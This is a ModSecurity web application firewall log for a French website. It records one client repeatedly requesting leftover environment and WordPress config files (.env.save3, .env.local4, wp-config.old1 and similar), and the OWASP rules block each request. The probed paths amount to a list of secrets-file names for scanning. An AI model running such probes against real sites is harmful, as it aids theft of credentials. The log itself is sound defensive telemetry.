[Mon May 11 11:24:17.244359 2026] [security2:error] [pid 1254212:tid 1254228] [client 185.177.72.9:4112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgP0YQeUtAPynIs6xQCwAAAA4"]
[Mon May 11 11:24:17.271919 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:4118] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env.save_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/node/.env.save_old"] [unique_id "agGgQUYQeUtAPynIs6xQEwAAAAE"]
[Mon May 11 11:24:17.272322 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:4118] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/node/.env.save_old"] [unique_id "agGgQUYQeUtAPynIs6xQEwAAAAE"]
[Mon May 11 11:24:18.501662 2026] [security2:error] [pid 1254212:tid 1254215] [client 185.177.72.9:4118] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgQUYQeUtAPynIs6xQEwAAAAE"]
[Mon May 11 11:24:29.946894 2026] [security2:error] [pid 1254242:tid 1254260] [client 185.177.72.9:14056] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notification/.env.save3"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/notification/.env.save3"] [unique_id "agGgTb4KNmD_mZ_vlf8wewAAAE8"]
[Mon May 11 11:24:29.947275 2026] [security2:error] [pid 1254242:tid 1254260] [client 185.177.72.9:14056] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/notification/.env.save3"] [unique_id "agGgTb4KNmD_mZ_vlf8wewAAAE8"]
[Mon May 11 11:24:31.125678 2026] [security2:error] [pid 1254242:tid 1254260] [client 185.177.72.9:14056] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgTb4KNmD_mZ_vlf8wewAAAE8"]
[Mon May 11 11:24:31.152073 2026] [security2:error] [pid 1254212:tid 1254230] [client 185.177.72.9:14058] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notification/.env.save3"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/notification/.env.save3"] [unique_id "agGgT0YQeUtAPynIs6xQGwAAABA"]
[Mon May 11 11:24:31.152575 2026] [security2:error] [pid 1254212:tid 1254230] [client 185.177.72.9:14058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/notification/.env.save3"] [unique_id "agGgT0YQeUtAPynIs6xQGwAAABA"]
[Mon May 11 11:24:32.383868 2026] [security2:error] [pid 1254212:tid 1254230] [client 185.177.72.9:14058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgT0YQeUtAPynIs6xQGwAAABA"]
[Mon May 11 11:24:41.161447 2026] [security2:error] [pid 1254328:tid 1254347] [client 185.177.72.9:60964] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.old found within REQUEST_FILENAME: /notification/wp-config.old1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/notification/wp-config.old1"] [unique_id "agGgWURdw2n9wv6Ai4__OgAAAJE"]
[Mon May 11 11:24:41.161853 2026] [security2:error] [pid 1254328:tid 1254347] [client 185.177.72.9:60964] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/notification/wp-config.old1"] [unique_id "agGgWURdw2n9wv6Ai4__OgAAAJE"]
[Mon May 11 11:24:43.451435 2026] [security2:error] [pid 1254328:tid 1254347] [client 185.177.72.9:60964] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgWURdw2n9wv6Ai4__OgAAAJE"]
[Mon May 11 11:24:43.478461 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:59322] ModSecurity: Warning. Matched phrase "wp-config.old" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.old found within REQUEST_FILENAME: /notification/wp-config.old1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/notification/wp-config.old1"] [unique_id "agGgW0YQeUtAPynIs6xQIgAAABI"]
[Mon May 11 11:24:43.479297 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:59322] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/notification/wp-config.old1"] [unique_id "agGgW0YQeUtAPynIs6xQIgAAABI"]
[Mon May 11 11:24:44.702104 2026] [security2:error] [pid 1254212:tid 1254232] [client 185.177.72.9:59322] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgW0YQeUtAPynIs6xQIgAAABI"]
[Mon May 11 11:25:02.036757 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:29162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env.dist_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/opt/.env.dist_old"] [unique_id "agGgbpkIEwRJMyDaV55FnQAAAUs"]
[Mon May 11 11:25:02.037564 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:29162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/opt/.env.dist_old"] [unique_id "agGgbpkIEwRJMyDaV55FnQAAAUs"]
[Mon May 11 11:25:03.219343 2026] [security2:error] [pid 1256241:tid 1256257] [client 185.177.72.9:29162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgbpkIEwRJMyDaV55FnQAAAUs"]
[Mon May 11 11:25:03.246373 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:6482] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env.dist_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/opt/.env.dist_old"] [unique_id "agGgb0Rdw2n9wv6Ai4__WQAAAIk"]
[Mon May 11 11:25:03.246614 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:6482] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/opt/.env.dist_old"] [unique_id "agGgb0Rdw2n9wv6Ai4__WQAAAIk"]
[Mon May 11 11:25:04.463216 2026] [security2:error] [pid 1254328:tid 1254340] [client 185.177.72.9:6482] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgb0Rdw2n9wv6Ai4__WQAAAIk"]
[Mon May 11 11:25:04.490959 2026] [security2:error] [pid 1254242:tid 1254263] [client 185.177.72.9:6492] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env.docker.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/opt/.env.docker.example"] [unique_id "agGgcL4KNmD_mZ_vlf8woQAAAFI"]
[Mon May 11 11:25:04.491185 2026] [security2:error] [pid 1254242:tid 1254263] [client 185.177.72.9:6492] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/opt/.env.docker.example"] [unique_id "agGgcL4KNmD_mZ_vlf8woQAAAFI"]
[Mon May 11 11:25:05.667592 2026] [security2:error] [pid 1254242:tid 1254263] [client 185.177.72.9:6492] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgcL4KNmD_mZ_vlf8woQAAAFI"]
[Mon May 11 11:25:05.695768 2026] [security2:error] [pid 1254179:tid 1254203] [client 185.177.72.9:6508] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env.docker.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/opt/.env.docker.example"] [unique_id "agGgcWS6k_SCYd1AVZqmgQAAARY"]
[Mon May 11 11:25:05.696010 2026] [security2:error] [pid 1254179:tid 1254203] [client 185.177.72.9:6508] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/opt/.env.docker.example"] [unique_id "agGgcWS6k_SCYd1AVZqmgQAAARY"]
[Mon May 11 11:25:07.013492 2026] [security2:error] [pid 1254179:tid 1254203] [client 185.177.72.9:6508] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgcWS6k_SCYd1AVZqmgQAAARY"]
[Mon May 11 11:25:07.040608 2026] [security2:error] [pid 1254212:tid 1254237] [client 185.177.72.9:6510] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env.local4"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/opt/.env.local4"] [unique_id "agGgc0YQeUtAPynIs6xQPgAAABc"]
[Mon May 11 11:25:07.041021 2026] [security2:error] [pid 1254212:tid 1254237] [client 185.177.72.9:6510] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/opt/.env.local4"] [unique_id "agGgc0YQeUtAPynIs6xQPgAAABc"]
[Mon May 11 11:25:08.282362 2026] [security2:error] [pid 1254212:tid 1254237] [client 185.177.72.9:6510] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgc0YQeUtAPynIs6xQPgAAABc"]
[Mon May 11 11:25:08.310076 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:6512] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env.local4"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/opt/.env.local4"] [unique_id "agGgdJkIEwRJMyDaV55FpAAAAU4"]
[Mon May 11 11:25:08.310408 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:6512] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/opt/.env.local4"] [unique_id "agGgdJkIEwRJMyDaV55FpAAAAU4"]
[Mon May 11 11:25:09.552656 2026] [security2:error] [pid 1256241:tid 1256260] [client 185.177.72.9:6512] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgdJkIEwRJMyDaV55FpAAAAU4"]
[Mon May 11 11:25:17.328353 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:23246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /output/.env.tmp_debug"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/output/.env.tmp_debug"] [unique_id "agGgfb4KNmD_mZ_vlf8wuAAAAEU"]
[Mon May 11 11:25:17.328983 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:23246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/output/.env.tmp_debug"] [unique_id "agGgfb4KNmD_mZ_vlf8wuAAAAEU"]
[Mon May 11 11:25:19.055053 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:23246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGgfb4KNmD_mZ_vlf8wuAAAAEU"]
[Mon May 11 11:25:19.080956 2026] [security2:error] [pid 1254179:tid 1254190] [client 185.177.72.9:23254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /output/.env.tmp_debug"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/output/.env.tmp_debug"] [unique_id "agGgf2S6k_SCYd1AVZqmlgAAAQk"]
[Mon May 11 11:25:19.081183 2026] [security2:error] [pid 1254179:tid 1254190] [client 185.177.72.9:23254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/output/.env.tmp_debug"] [unique_id "agGgf2S6k_SCYd1AVZqmlgAAAQk"]
